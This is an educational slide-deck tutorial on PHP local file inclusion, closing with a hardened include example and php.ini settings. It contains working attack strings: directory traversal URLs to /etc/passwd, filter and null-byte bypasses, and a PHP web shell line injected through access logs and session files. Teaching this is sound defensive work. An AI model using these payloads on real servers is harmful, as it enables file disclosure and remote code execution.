File inclusion vulnerabilities allow attackers to include local and remote files on a server. If the inclusion logic is not implemented properly, it can lead to source code disclosure, sensitive data exposure, and remote code execution. Common file inclusion attacks traverse directories, bypass extension checks, or inject payloads into log files or PHP session files that are later executed by the server. Proper input validation and restricting which files may be included help mitigate these risks.
2. $ 7absec
File Inclusion is a common web application vulnerability that can easily be overlooked because it looks like part of the application's functionality. Server-side languages such as PHP or JSP can dynamically include external scripts, reducing a script's overall size and simplifying the code.
3.
If the inclusion logic isn't implemented properly, attackers can include both local and remote files, potentially leading to source code disclosure, sensitive data exposure, and, under certain conditions, code execution.
6.
Local File Inclusion (LFI) is an attack on a web application in which the attacker makes it include local files that are present on the system.
7. Basic LFI: Explanation
• The simplest form of local file inclusion.
• No restrictions and no processing of the parameter: the user-supplied value is passed straight to include().
• include($_GET['FileName']);
8. Basic LFI: Use Case (The World-File inclusion)
• Linux
  /etc/passwd
  http://example.com/?file=/etc/passwd
• Windows
  C:\Windows\boot.ini
  http://example.com/?file=C:\Windows\boot.ini
9. LFI with Path Traversal: Explanation
• Sometimes developers specify an absolute path prefix when including files.
• include("./file/" . $_GET['FileName']);
• Input from parameters can even be used as part of the filename itself.
• include("file_" . $_GET['FileName']);
10. LFI with Path Traversal: Use Case
• This restriction can be bypassed by traversing directories with a few ../ sequences placed before the desired file name.
• http://example.com/?file=../../../../../etc/passwd
• http://example.com/?file=/../../../../../etc/passwd
11. LFI with Blacklisting: Explanation
• Scripts can employ search-and-replace techniques to strip path traversal sequences.
• $File = str_replace('../', '', $_GET['FileName']);
12. LFI with Blacklisting: Use Case
• This restriction can be bypassed with ....//....//....// because str_replace() makes a single pass: removing the inner ../ from ....// leaves exactly ../ behind.
• http://example.com/?file=....//....//....//etc/passwd
• Bypass via URL encoding: ../ == %2e%2e%2f (this only helps when the filter inspects the raw, still-encoded value, since PHP decodes $_GET before the script sees it).
• http://example.com/?file=%2e%2e%2fetc/passwd
13. LFI with Appended Extension: Explanation
• Scripts can manually append .php or any other required extension before including the file.
• include($_GET['language'] . ".php");
14. LFI with Appended Extension: Use Case
• PHP versions before 5.5 are vulnerable to null byte injection.
• Adding a null byte (\x00, URL-encoded as %00) at the end of the filename should bypass the extension check, because the appended ".php" falls after the terminator.
• This can also be bypassed with PHP wrappers.
• http://example.com/?file=/etc/passwd%00
15. LFI to Remote Code Execution
• LFI can lead to Remote Code Execution (RCE) under some conditions, resulting in a complete server compromise.
• One common way is to poison log files, which are modified based on requests made to the web server.
16. RCE through Apache / Nginx Log files: Explanation
• Apache and Nginx maintain various log files such as access.log and error.log.
• The access.log file contains information about all requests made to the server, including their User-Agent strings.
• http://example.com/?file=/var/log/apache2/access.log
17. RCE through Apache / Nginx Log files: Use Case
• The log contains the remote IP address, the requested page, the response code, and the User-Agent string, all written verbatim.
• <?php system($_GET['cmd']); ?>
18. RCE through PHP Session Files: Explanation
• Similar to server log files, PHP saves user sessions on disk.
• This path is dictated by the session.save_path configuration directive, which is empty by default (PHP then falls back to the system temporary directory).
• http://example.com/?file=/var/lib/php/sessions/sess_$id
19. RCE through PHP Session Files: Use Case
• Injecting a PHP web shell into the session file through a parameter the application stores in the session.
• http://example.com/?file=<?php system($_GET['cmd']); ?>
20. Hardening Techniques
1: Use the built-in tools
   basename()
   open_basedir
   display_errors (off)
   disable_functions (system, shell_exec, curl_exec, etc.)
2: Do the correct checks
   use an allow-list instead of a deny-list
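The following is an added example, not code from the original slides: the vulnerable include pattern from slides 9 and 11 beside an include that applies the hardening advice above (basename(), an allow-list instead of the bypassable str_replace deny-list, and a realpath containment check). The directory layout ./pages/<name>.php and the page names in the allow-list are assumptions.

```php
<?php
// Added hardening example (not from the original slides): the vulnerable
// include pattern beside a version that applies the slide's advice.
// Assumed layout: templates live in ./pages/<name>.php, chosen by ?page=<name>.
declare(strict_types=1);

// Vulnerable pattern from the slides (shown for contrast, never deploy):
//   include("./pages/" . $_GET['page'] . ".php");
// "../../etc/passwd" and "....//....//etc/passwd" reach the filesystem
// unchanged, and a null byte (pre-5.5, per the slides) drops the ".php".

// Allow-list of the only page names that may ever be included (assumed).
const ALLOWED_PAGES = ['home', 'about', 'contact'];

// Returns the canonical path of the template to include, or null when the
// request must be rejected. Order matters: allow-list first, realpath second.
function resolve_page(string $userInput, string $baseDir): ?string
{
    // basename() strips every directory component, so any traversal prefix
    // is gone before the comparison; a stray null byte still fails in_array().
    $name = basename($userInput);

    // Allow-list instead of deny-list: str_replace('../', '', ...) is
    // bypassable with "....//"; an exact-match allow-list is not.
    if (!in_array($name, ALLOWED_PAGES, true)) {
        return null;
    }

    // Defence in depth: canonicalise both sides and confirm the resolved file
    // still lies inside $baseDir (covers symlinks and future allow-list edits).
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Request handler: only a path approved by resolve_page() is ever included.
$requested = $_GET['page'] ?? 'home';
$path = resolve_page(is_string($requested) ? $requested : '', __DIR__ . '/pages');
if ($path === null) {
    http_response_code(400);
    exit('Invalid page');
}
include $path;
```

Pair this with the php.ini settings the slide lists (open_basedir, disable_functions, display_errors=Off) and with allow_url_include=Off for the remote variant, so that a slip in application code still cannot read arbitrary files or spawn a shell.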